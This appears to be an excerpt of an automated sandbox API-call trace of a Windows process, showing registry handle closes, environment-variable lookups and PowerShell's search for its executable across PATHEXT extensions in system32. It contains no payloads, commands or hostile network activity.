	[0320.971] RegCloseKey (hKey=0x308) returned 0x0
	[0320.971] RegCloseKey (hKey=0x304) returned 0x0
	[0320.971] RegCloseKey (hKey=0x3a0) returned 0x0
	[0320.971] RegCloseKey (hKey=0x39c) returned 0x0
	[0320.972] RegCloseKey (hKey=0x378) returned 0x0
	[0320.972] RegCloseKey (hKey=0x3b0) returned 0x0
	[0320.972] RegCloseKey (hKey=0x394) returned 0x0
	[0641.609] RegCloseKey (hKey=0x3b4) returned 0x0
	[0641.609] RegCloseKey (hKey=0x344) returned 0x0

Thread:
	id = 223
	os_tid = 0xc78


Thread:
	id = 319
	os_tid = 0xf7c

	[0333.124] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0333.128] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0333.132] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0333.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.133] CoTaskMemFree (pv=0xed700) 
	[0333.134] VirtualQuery (in: lpAddress=0x1c72da80, lpBuffer=0x1c72e940, dwLength=0x30 | out: lpBuffer=0x1c72e940*(BaseAddress=0x1c72d000, AllocationBase=0x1bda0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0333.137] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0333.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.137] CoTaskMemFree (pv=0xed700) 
	[0333.139] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0333.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.139] CoTaskMemFree (pv=0xed700) 
	[0333.142] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0333.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.142] CoTaskMemFree (pv=0xed700) 
	[0333.155] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0333.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.155] CoTaskMemFree (pv=0xed700) 
	[0334.158] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.158] CoTaskMemFree (pv=0xed700) 
	[0334.159] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.159] CoTaskMemFree (pv=0xed700) 
	[0334.164] VirtualQuery (in: lpAddress=0x1c72dd30, lpBuffer=0x1c72ebf0, dwLength=0x30 | out: lpBuffer=0x1c72ebf0*(BaseAddress=0x1c72d000, AllocationBase=0x1bda0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.165] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.165] CoTaskMemFree (pv=0xed700) 
	[0334.168] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.168] CoTaskMemFree (pv=0xed700) 
	[0334.168] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.168] CoTaskMemFree (pv=0xed700) 
	[0334.170] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.170] CoTaskMemFree (pv=0xed700) 
	[0334.174] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.174] CoTaskMemFree (pv=0xed700) 
	[0334.956] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.956] CoTaskMemFree (pv=0xed700) 
	[0334.958] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.958] CoTaskMemFree (pv=0xed700) 
	[0334.959] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.959] CoTaskMemFree (pv=0xed700) 
	[0334.962] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.962] CoTaskMemFree (pv=0xed700) 
	[0334.963] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.963] CoTaskMemFree (pv=0xed700) 
	[0334.964] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.964] CoTaskMemFree (pv=0xed700) 
	[0334.966] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0334.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.966] CoTaskMemFree (pv=0xed700) 
	[0335.438] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0335.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0335.438] CoTaskMemFree (pv=0xed700) 
	[0335.935] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0335.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0335.935] CoTaskMemFree (pv=0xed700) 
	[0335.938] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0335.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0335.938] CoTaskMemFree (pv=0xed700) 
	[0335.938] CoTaskMemAlloc (cb=0x128) returned 0x1b7f4950
	[0335.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7f4950, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0335.938] CoTaskMemFree (pv=0x1b7f4950) 
	[0335.943] CoTaskMemAlloc (cb=0x20e) returned 0xa6ed0
	[0335.943] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xa6ed0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0335.943] CoTaskMemFree (pv=0xa6ed0) 
	[0335.947] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0335.948] SetErrorMode (uMode=0x1) returned 0x1
	[0335.951] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0335.960] SetErrorMode (uMode=0x1) returned 0x1
	[0335.962] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0335.962] SetErrorMode (uMode=0x1) returned 0x1
	[0335.962] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.423] SetErrorMode (uMode=0x1) returned 0x1
	[0336.424] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.424] SetErrorMode (uMode=0x1) returned 0x1
	[0336.424] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.432] SetErrorMode (uMode=0x1) returned 0x1
	[0336.434] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.434] SetErrorMode (uMode=0x1) returned 0x1
	[0336.434] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.442] SetErrorMode (uMode=0x1) returned 0x1
	[0336.443] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.443] SetErrorMode (uMode=0x1) returned 0x1
	[0336.443] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.451] SetErrorMode (uMode=0x1) returned 0x1
	[0336.453] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.453] SetErrorMode (uMode=0x1) returned 0x1
	[0336.453] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.461] SetErrorMode (uMode=0x1) returned 0x1
	[0336.462] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.462] SetErrorMode (uMode=0x1) returned 0x1
	[0336.462] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.892] SetErrorMode (uMode=0x1) returned 0x1
	[0336.893] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.893] SetErrorMode (uMode=0x1) returned 0x1
	[0336.893] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.901] SetErrorMode (uMode=0x1) returned 0x1
	[0336.902] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.903] SetErrorMode (uMode=0x1) returned 0x1
	[0336.903] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.911] SetErrorMode (uMode=0x1) returned 0x1
	[0336.912] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.912] SetErrorMode (uMode=0x1) returned 0x1
	[0336.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0336.923] SetErrorMode (uMode=0x1) returned 0x1
	[0336.925] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0336.925] SetErrorMode (uMode=0x1) returned 0x1
	[0336.925] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.324] SetErrorMode (uMode=0x1) returned 0x1
	[0337.325] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.325] SetErrorMode (uMode=0x1) returned 0x1
	[0337.326] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.334] SetErrorMode (uMode=0x1) returned 0x1
	[0337.335] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.335] SetErrorMode (uMode=0x1) returned 0x1
	[0337.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.344] SetErrorMode (uMode=0x1) returned 0x1
	[0337.345] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.345] SetErrorMode (uMode=0x1) returned 0x1
	[0337.345] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.353] SetErrorMode (uMode=0x1) returned 0x1
	[0337.683] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0337.683] SetErrorMode (uMode=0x1) returned 0x1
	[0337.683] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.692] SetErrorMode (uMode=0x1) returned 0x1
	[0337.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.694] SetErrorMode (uMode=0x1) returned 0x1
	[0337.694] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.694] SetErrorMode (uMode=0x1) returned 0x1
	[0337.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.695] SetErrorMode (uMode=0x1) returned 0x1
	[0337.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.695] SetErrorMode (uMode=0x1) returned 0x1
	[0337.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.695] SetErrorMode (uMode=0x1) returned 0x1
	[0337.696] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.696] SetErrorMode (uMode=0x1) returned 0x1
	[0337.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.696] SetErrorMode (uMode=0x1) returned 0x1
	[0337.696] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c72dc60 | out: lpFindFileData=0x1c72dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0337.697] SetErrorMode (uMode=0x1) returned 0x1
	[0337.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0337.697] SetErrorMode (uMode=0x1) returned 0x1
